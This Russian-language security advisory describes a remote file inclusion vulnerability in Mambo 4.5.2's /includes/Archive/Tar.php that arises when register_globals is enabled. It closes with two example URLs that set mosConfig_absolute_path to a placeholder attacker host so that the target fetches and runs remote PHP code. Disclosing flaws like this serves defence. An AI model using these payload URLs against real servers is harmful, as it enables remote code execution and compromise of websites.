Программа: Mambo 4.5.2
Уязвимость позволяет удаленному
пользователю выполнить произвольный php
сценарий на уязвимой системе. Уязвимость
существует в сценарии '/includes/Archive/Tar.php' при
обработке значения переменной 'mosConfig_absolute_path',
которая должна указывать на
местонахождение сценария '/includes/PEAR/PEAR.php'.
Если на целевом сервере включена опция
register_globals, удаленный пользователь может с
помощью специально сформированного URL
изменить значение переменной 'mosConfig_absolute_path'
и выполнить произвольный код на системе с
привилегиями web сервера.
Примеры:
http://[target]/mambo/includes/archive/Tar.php? GLOBALS[mosConf
ig_absolute_path]=http://[attacker]/
http://[target]/mambo/includes/archive/Tar.php? mosConfig_absolute_path=http://[attacker]/
